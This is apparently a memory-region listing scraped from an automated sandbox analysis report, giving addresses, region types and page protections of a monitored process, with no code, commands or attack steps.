||
|
DC0000
|
heap
|
page read and write
|
||
|
1A9A4750000
|
heap
|
page read and write
|
||
|
580B000
|
trusted library allocation
|
page read and write
|
||
|
271C005D000
|
heap
|
page read and write
|
||
|
8790000
|
direct allocation
|
page read and write
|
||
|
271C2093000
|
heap
|
page read and write
|
||
|
6F05000
|
heap
|
page read and write
|
||
|
8760000
|
direct allocation
|
page read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
271C03C0000
|
remote allocation
|
page read and write
|
||
|
1A98C206000
|
trusted library allocation
|
page read and write
|
||
|
32D0000
|
heap
|
page read and write
|
||
|
2CFE000
|
stack
|
page read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
|
59B413E000
|
stack
|
page read and write
|
||
|
A20000
|
unkown
|
page read and write
|
||
|
F70000
|
direct allocation
|
page read and write
|
||
|
BD0000
|
unkown
|
page read and write
|
||
|
271BFF60000
|
heap
|
page read and write
|
||
|
7720000
|
trusted library allocation
|
page read and write
|
||
|
271C1FE4000
|
heap
|
page read and write
|
||
|
25830000
|
unclassified section
|
page execute and read and write
|
||
|
271C2108000
|
heap
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page read and write
|
||
|
283491FB000
|
heap
|
page read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
2690000
|
unkown
|
page readonly
|
||
|
BF0000
|
unkown
|
page read and write
|
||
|
59B37DD000
|
stack
|
page read and write
|
||
|
3169000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
271C2045000
|
heap
|
page read and write
|
||
|
238CC000
|
heap
|
page read and write
|
||
|
316E000
|
heap
|
page read and write
|
||
|
271C1EE3000
|
heap
|
page read and write
|
||
|
6C90000
|
heap
|
page execute and read and write
|
||
|
1A98D62D000
|
trusted library allocation
|
page read and write
|
||
|
271C1F60000
|
heap
|
page read and write
|
||
|
6E60000
|
direct allocation
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
6E10000
|
direct allocation
|
page read and write
|
||
|
91C0000
|
direct allocation
|
page execute and read and write
|
||
|
271C2083000
|
heap
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
6E30000
|
direct allocation
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
82C6000
|
heap
|
page read and write
|
||
|
271C202C000
|
heap
|
page read and write
|
||
|
271C2045000
|
heap
|
page read and write
|
||
|
4740000
|
trusted library allocation
|
page execute and read and write
|
||
|
7650000
|
trusted library allocation
|
page execute and read and write
|
||
|
4510000
|
remote allocation
|
page execute and read and write
|
||
|
744E000
|
heap
|
page read and write
|
||
|
59B3A3F000
|
stack
|
page read and write
|
||
|
861D000
|
stack
|
page read and write
|
||
|
271C2148000
|
heap
|
page read and write
|
||
|
7F40000
|
heap
|
page read and write
|
||
|
4C7000
|
unkown
|
page readonly
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
1A98E12C000
|
trusted library allocation
|
page read and write
|
||
|
6E50000
|
direct allocation
|
page read and write
|
||
|
271C208F000
|
heap
|
page read and write
|
||
|
1A98C170000
|
heap
|
page read and write
|
||
|
CDC0000
|
direct allocation
|
page execute and read and write
|
||
|
E55000
|
heap
|
page read and write
|
||
|
271C232F000
|
heap
|
page read and write
|
||
|
8455000
|
trusted library allocation
|
page read and write
|
||
|
59B3CFE000
|
stack
|
page read and write
|
||
|
85A000
|
stack
|
page read and write
|
||
|
4C7000
|
unkown
|
page readonly
|
||
|
271C2160000
|
heap
|
page read and write
|
||
|
AE0000
|
unkown
|
page readonly
|
||
|
1A98CC2D000
|
trusted library allocation
|
page read and write
|
||
|
57C9000
|
trusted library allocation
|
page read and write
|
||
|
271C22D0000
|
heap
|
page read and write
|
||
|
A11000
|
unkown
|
page readonly
|
||
|
271C2273000
|
heap
|
page read and write
|
||
|
271C28D1000
|
heap
|
page read and write
|
||
|
283491D0000
|
heap
|
page read and write
|
||
|
80F7000
|
stack
|
page read and write
|
||
|
271C208F000
|
heap
|
page read and write
|
||
|
8230000
|
heap
|
page read and write
|
||
|
E46000
|
heap
|
page read and write
|
||
|
470F000
|
stack
|
page read and write
|
||
|
271C1F5B000
|
heap
|
page read and write
|
||
|
1A9A48C4000
|
heap
|
page read and write
|
||
|
F50000
|
heap
|
page readonly
|
||
|
C70000
|
direct allocation
|
page read and write
|
||
|
E3D000
|
heap
|
page read and write
|
||
|
271C2338000
|
heap
|
page read and write
|
||
|
2BF0000
|
unkown
|
page readonly
|
||
|
271C1F53000
|
heap
|
page read and write
|
||
|
4C5000
|
unkown
|
page read and write
|
||
|
DB7000
|
heap
|
page read and write
|
||
|
271C2105000
|
heap
|
page read and write
|
||
|
463D000
|
trusted library allocation
|
page execute and read and write
|
||
|
271C24D0000
|
heap
|
page read and write
|
||
|
2E5B000
|
heap
|
page read and write
|
||
|
8200000
|
trusted library allocation
|
page execute and read and write
|
||
|
23955000
|
heap
|
page read and write
|
||
|
271C1F68000
|
heap
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
7FFD9BA46000
|
trusted library allocation
|
page read and write
|
||
|
2375E000
|
stack
|
page read and write
|
||
|
7E50000
|
direct allocation
|
page read and write
|
||
|
1A9A418F000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
271C2130000
|
heap
|
page read and write
|
||
|
271C20E8000
|
heap
|
page read and write
|
||
|
AD0000
|
unkown
|
page readonly
|
||
|
73D3000
|
heap
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
1A9A4892000
|
heap
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
4C7000
|
unkown
|
page readonly
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
2589D000
|
unclassified section
|
page execute and read and write
|
||
|
E46000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
2580000
|
heap
|
page read and write
|
||
|
73FD000
|
heap
|
page read and write
|
||
|
4EC1000
|
direct allocation
|
page execute and read and write
|
||
|
23E50000
|
unclassified section
|
page execute and read and write
|
||
|
271C1F3B000
|
heap
|
page read and write
|
||
|
47FA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
1A9A48CA000
|
heap
|
page read and write
|
||
|
4EBD000
|
direct allocation
|
page execute and read and write
|
||
|
3110000
|
remote allocation
|
page execute and read and write
|
||
|
23510000
|
direct allocation
|
page read and write
|
||
|
2346F000
|
stack
|
page read and write
|
||
|
BA0000
|
unkown
|
page readonly
|
||
|
271C1F03000
|
heap
|
page read and write
|
||
|
271C1EFE000
|
heap
|
page read and write
|
||
|
232FE000
|
stack
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
23DD1000
|
direct allocation
|
page execute and read and write
|
||
|
271C1F13000
|
heap
|
page read and write
|
||
|
E46000
|
heap
|
page read and write
|
||
|
4649000
|
trusted library allocation
|
page read and write
|
||
|
2D2D000
|
heap
|
page read and write
|
||
|
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
|
59B3C7E000
|
stack
|
page read and write
|
||
|
6B9E000
|
stack
|
page read and write
|
||
|
271BFF70000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7E80000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
|
271C1ED3000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
15B1000
|
unkown
|
page readonly
|
||
|
271C1FD1000
|
heap
|
page read and write
|
||
|
E4F000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
4710000
|
heap
|
page readonly
|
||
|
2361D000
|
stack
|
page read and write
|
||
|
2EAE000
|
stack
|
page read and write
|
||
|
271C232F000
|
heap
|
page read and write
|
||
|
271C2273000
|
heap
|
page read and write
|
||
|
D53FCFA000
|
stack
|
page read and write
|
||
|
4B0000
|
unkown
|
page readonly
|
||
|
271C1EE9000
|
heap
|
page read and write
|
||
|
3B10000
|
remote allocation
|
page execute and read and write
|
||
|
4D19000
|
direct allocation
|
page execute and read and write
|
||
|
271C2572000
|
heap
|
page read and write
|
||
|
3280000
|
heap
|
page read and write
|
||
|
D5403FC000
|
stack
|
page read and write
|
||
|
4BE000
|
unkown
|
page readonly
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
81A0000
|
heap
|
page read and write
|
||
|
D70000
|
unkown
|
page readonly
|
||
|
271C1ED1000
|
heap
|
page read and write
|
||
|
271C1F41000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
271C202C000
|
heap
|
page read and write
|
||
|
1220000
|
unkown
|
page readonly
|
||
|
2A5C000
|
stack
|
page read and write
|
||
|
E33000
|
heap
|
page read and write
|
||
|
E41000
|
heap
|
page read and write
|
||
|
1A98A64A000
|
heap
|
page read and write
|
||
|
B70000
|
heap
|
page read and write
|
||
|
3174000
|
heap
|
page read and write
|
||
|
271C2100000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
DF4000
|
heap
|
page read and write
|
||
|
2AC0000
|
heap
|
page read and write
|
||
|
1A98E378000
|
trusted library allocation
|
page read and write
|
||
|
59B3753000
|
stack
|
page read and write
|
||
|
4B1000
|
unkown
|
page execute read
|
||
|
721E000
|
stack
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page read and write
|
||
|
A5C0000
|
direct allocation
|
page execute and read and write
|
||
|
271C22F3000
|
heap
|
page read and write
|
||
|
4640000
|
trusted library allocation
|
page read and write
|
||
|
271C1ED1000
|
heap
|
page read and write
|
||
|
1A98E1B0000
|
trusted library allocation
|
page read and write
|
||
|
870C000
|
stack
|
page read and write
|
||
|
271C0050000
|
heap
|
page read and write
|
||
|
271C1FFD000
|
heap
|
page read and write
|
||
|
331E000
|
stack
|
page read and write
|
||
|
F3F000
|
stack
|
page read and write
|
||
|
271C1F0B000
|
heap
|
page read and write
|
||
|
271C203F000
|
heap
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
1A98A5E0000
|
heap
|
page read and write
|
||
|
271C00D9000
|
heap
|
page read and write
|
||
|
316E000
|
heap
|
page read and write
|
||
|
4610000
|
trusted library section
|
page read and write
|
||
|
271C1F23000
|
heap
|
page read and write
|
||
|
4C5000
|
unkown
|
page read and write
|
||
|
23B00000
|
direct allocation
|
page execute and read and write
|
||
|
8780000
|
trusted library allocation
|
page execute and read and write
|
||
|
2365C000
|
stack
|
page read and write
|
||
|
3169000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
271C2081000
|
heap
|
page read and write
|
||
|
86CE000
|
stack
|
page read and write
|
||
|
23E42000
|
direct allocation
|
page execute and read and write
|
||
|
C3C0000
|
direct allocation
|
page execute and read and write
|
||
|
5C0000
|
unkown
|
page readonly
|
||
|
271C00D9000
|
heap
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
1A98C020000
|
trusted library allocation
|
page read and write
|
||
|
6C95000
|
heap
|
page execute and read and write
|
||
|
B60000
|
unkown
|
page readonly
|
||
|
1A98E165000
|
trusted library allocation
|
page read and write
|
||
|
893D72D000
|
stack
|
page read and write
|
||
|
6F10000
|
heap
|
page read and write
|
||
|
1A9A486C000
|
heap
|
page read and write
|
||
|
271C2145000
|
heap
|
page read and write
|
||
|
C30000
|
direct allocation
|
page read and write
|
||
|
271C231D000
|
heap
|
page read and write
|
||
|
F18000
|
heap
|
page read and write
|
||
|
271C2083000
|
heap
|
page read and write
|
||
|
764D000
|
stack
|
page read and write
|
||
|
271C2476000
|
heap
|
page read and write
|
||
|
283491F0000
|
heap
|
page read and write
|
||
|
271C205D000
|
heap
|
page read and write
|
||
|
1A9A4868000
|
heap
|
page read and write
|
||
|
2A00000
|
unkown
|
page readonly
|
||
|
271C2125000
|
heap
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
59B4B8E000
|
stack
|
page read and write
|
||
|
2CBD000
|
stack
|
page read and write
|
||
|
7E40000
|
direct allocation
|
page read and write
|
||
|
271C03C0000
|
remote allocation
|
page read and write
|
||
|
271C2571000
|
heap
|
page read and write
|
||
|
28349170000
|
heap
|
page read and write
|
||
|
4750000
|
trusted library allocation
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page read and write
|
||
|
23C29000
|
direct allocation
|
page execute and read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
325B000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page read and write
|
||
|
271C216D000
|
heap
|
page read and write
|
||
|
271C1F50000
|
heap
|
page read and write
|
||
|
9A0000
|
unkown
|
page readonly
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
980000
|
unkown
|
page readonly
|
||
|
BA0000
|
unkown
|
page readonly
|
||
|
4634000
|
trusted library allocation
|
page read and write
|
||
|
59B4C0D000
|
stack
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
59B41BB000
|
stack
|
page read and write
|
||
|
4F32000
|
direct allocation
|
page execute and read and write
|
||
|
3330000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
98C000
|
stack
|
page read and write
|
||
|
8120000
|
trusted library allocation
|
page read and write
|
||
|
1A98C69E000
|
trusted library allocation
|
page read and write
|
||
|
271C207D000
|
heap
|
page read and write
|
||
|
271C1F36000
|
heap
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
1A9A490F000
|
heap
|
page read and write
|
||
|
271C246D000
|
heap
|
page read and write
|
||
|
271C1F2B000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
4B1000
|
unkown
|
page execute read
|
||
|
7E70000
|
direct allocation
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
E41000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
271C20B7000
|
heap
|
page read and write
|
||
|
233EE000
|
stack
|
page read and write
|
||
|
271C2310000
|
heap
|
page read and write
|
||
|
4760000
|
heap
|
page execute and read and write
|
||
|
8246000
|
heap
|
page read and write
|
||
|
739E000
|
heap
|
page read and write
|
||
|
271C219B000
|
heap
|
page read and write
|
||
|
2CE2000
|
unkown
|
page read and write
|
||
|
C70000
|
direct allocation
|
page read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
23520000
|
direct allocation
|
page read and write
|
||
|
274B000
|
heap
|
page read and write
|
||
|
271C2273000
|
heap
|
page read and write
|
||
|
2560000
|
heap
|
page read and write
|
||
|
271C1EE2000
|
heap
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page read and write
|
||
|
271C2135000
|
heap
|
page read and write
|
||
|
24850000
|
unclassified section
|
page execute and read and write
|
||
|
2780000
|
unkown
|
page execute and read and write
|
||
|
236DC000
|
stack
|
page read and write
|
||
|
59B3D7E000
|
stack
|
page read and write
|
||
|
1A9A48EC000
|
heap
|
page read and write
|
||
|
85A000
|
stack
|
page read and write
|
||
|
4B0000
|
unkown
|
page readonly
|
||
|
1A9A48D1000
|
heap
|
page read and write
|
||
|
8260000
|
heap
|
page read and write
|
||
|
271C210D000
|
heap
|
page read and write
|
||
|
1A98A570000
|
heap
|
page read and write
|
||
|
303D000
|
stack
|
page read and write
|
||
|
4D8E000
|
direct allocation
|
page execute and read and write
|
||
|
C70000
|
direct allocation
|
page read and write
|
||
|
1A9A46F7000
|
heap
|
page execute and read and write
|
||
|
271C20F0000
|
heap
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
47A1000
|
trusted library allocation
|
page read and write
|
||
|
1A98E153000
|
trusted library allocation
|
page read and write
|
||
|
237A1000
|
heap
|
page read and write
|
||
|
271C2128000
|
heap
|
page read and write
|
||
|
1DD000
|
stack
|
page read and write
|
||
|
DC0000
|
heap
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page read and write
|
||
|
1A9A4850000
|
heap
|
page read and write
|
||
|
1A98DD96000
|
trusted library allocation
|
page read and write
|
||
|
BB0000
|
heap
|
page read and write
|
||
|
E27000
|
heap
|
page read and write
|
||
|
502A000
|
trusted library allocation
|
page read and write
|
||
|
9BC0000
|
direct allocation
|
page execute and read and write
|
||
|
2740000
|
heap
|
page read and write
|
||
|
1A98CC08000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
|
1A98DD80000
|
trusted library allocation
|
page read and write
|
||
|
3251000
|
heap
|
page read and write
|
||
|
271C20AE000
|
heap
|
page read and write
|
||
|
271C1F6E000
|
heap
|
page read and write
|
||
|
74A7000
|
trusted library allocation
|
page read and write
|
||
|
4BE000
|
unkown
|
page readonly
|
There are 963 hidden memdumps, click here to show them.